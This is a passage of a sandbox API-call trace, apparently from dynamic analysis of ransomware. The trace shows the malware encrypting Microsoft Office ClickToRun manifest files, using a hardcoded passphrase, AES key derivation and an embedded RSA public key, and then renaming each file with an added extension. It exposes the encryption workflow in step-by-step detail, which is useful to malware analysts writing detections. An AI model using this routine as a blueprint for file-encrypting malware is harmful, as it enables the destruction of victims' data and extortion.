"c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proofing.msi.16.en-us.xml")) returned 0x20 [0236.311] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0236.312] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proofing.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.312] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proofing.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.312] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.312] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28005b8) returned 1 [0236.317] CryptCreateHash (in: hProv=0x28005b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.317] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.317] CryptHashData (hHash=0x27ebc60, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.317] CryptDeriveKey (in: hProv=0x28005b8, Algid=0x6610, hBaseData=0x27ebc60, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebce0) returned 1 [0236.317] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.317] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.317] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2800640) returned 1 [0236.318] CryptImportPublicKeyInfo (in: hCryptProv=0x2800640, dwCertEncodingType=0x1, pInfo=0x27f7bf8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f7c28*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f7c30*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb260) returned 1 [0236.318] CryptEncrypt (in: hKey=0x27eb260, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.318] CryptEncrypt (in: hKey=0x27eb260, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28006c8*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28006c8*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.318] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28006c8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.318] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf90, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.318] CryptEncrypt (in: hKey=0x27ebce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.318] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.318] CloseHandle (hObject=0xffffffff) returned 1 [0236.318] CloseHandle (hObject=0xffffffff) returned 1 [0236.318] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proofing.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proofing.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0236.319] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0236.319] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proofing.msi.16.en-us.xml.gsg")) returned 0 [0236.319] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proofing.msi.16.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proofing.msi.16.en-us.xml.fuck")) returned 0 [0236.320] CryptDestroyHash (hHash=0x27ebc60) returned 1 [0236.320] CryptDestroyKey (hKey=0x27ebce0) returned 1 [0236.320] CryptReleaseContext (hProv=0x28005b8, dwFlags=0x0) returned 1 [0236.320] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.320] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.320] GetLastError () returned 0x5 [0236.320] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml")) returned 0x20 [0236.321] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0236.321] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.321] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.321] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.321] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27fef68) returned 1 [0236.326] CryptCreateHash (in: hProv=0x27fef68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.326] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.326] CryptHashData (hHash=0x27ebc60, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.326] CryptDeriveKey (in: hProv=0x27fef68, Algid=0x6610, hBaseData=0x27ebc60, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebce0) returned 1 [0236.327] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.327] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.327] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27ffa08) returned 1 [0236.328] CryptImportPublicKeyInfo (in: hCryptProv=0x27ffa08, dwCertEncodingType=0x1, pInfo=0x27f7d98*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f7dc8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f7dd0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb2a0) returned 1 [0236.328] CryptEncrypt (in: hKey=0x27eb2a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.328] CryptEncrypt (in: hKey=0x27eb2a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28004a8*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28004a8*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.328] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28004a8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.328] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf90, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.328] CryptEncrypt (in: hKey=0x27ebce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.328] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.328] CloseHandle (hObject=0xffffffff) returned 1 [0236.328] CloseHandle (hObject=0xffffffff) returned 1 [0236.328] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0236.329] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0236.329] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml.gsg")) returned 0 [0236.329] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml.fuck")) returned 0 [0236.329] CryptDestroyHash (hHash=0x27ebc60) returned 1 [0236.330] CryptDestroyKey (hKey=0x27ebce0) returned 1 [0236.330] CryptReleaseContext (hProv=0x27fef68, dwFlags=0x0) returned 1 [0236.330] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.330] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.330] GetLastError () returned 0x5 [0236.330] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publishermui.msi.16.en-us.xml")) returned 0x20 [0236.330] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0236.330] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publishermui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.330] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publishermui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.331] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.331] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28005b8) returned 1 [0236.335] CryptCreateHash (in: hProv=0x28005b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.335] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.335] CryptHashData (hHash=0x27ebce0, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.335] CryptDeriveKey (in: hProv=0x28005b8, Algid=0x6610, hBaseData=0x27ebce0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27eb8a0) returned 1 [0236.336] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.336] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.336] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27ffb18) returned 1 [0236.337] CryptImportPublicKeyInfo (in: hCryptProv=0x27ffb18, dwCertEncodingType=0x1, pInfo=0x27f7f38*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f7f68*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f7f70*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb3a0) returned 1 [0236.337] CryptEncrypt (in: hKey=0x27eb3a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.337] CryptEncrypt (in: hKey=0x27eb3a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ffba0*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27ffba0*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.337] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27ffba0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.337] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf90, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.337] CryptEncrypt (in: hKey=0x27eb8a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.337] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.337] CloseHandle (hObject=0xffffffff) returned 1 [0236.337] CloseHandle (hObject=0xffffffff) returned 1 [0236.337] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publishermui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publishermui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0236.338] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0236.338] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publishermui.msi.16.en-us.xml.gsg")) returned 0 [0236.338] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publishermui.msi.16.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publishermui.msi.16.en-us.xml.fuck")) returned 0 [0236.338] CryptDestroyHash (hHash=0x27ebce0) returned 1 [0236.338] CryptDestroyKey (hKey=0x27eb8a0) returned 1 [0236.338] CryptReleaseContext (hProv=0x28005b8, dwFlags=0x0) returned 1 [0236.338] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.338] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.339] GetLastError () returned 0x5 [0236.339] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml")) returned 0x20 [0236.339] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0236.339] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.342] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.342] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.342] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27fef68) returned 1 [0236.346] CryptCreateHash (in: hProv=0x27fef68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: 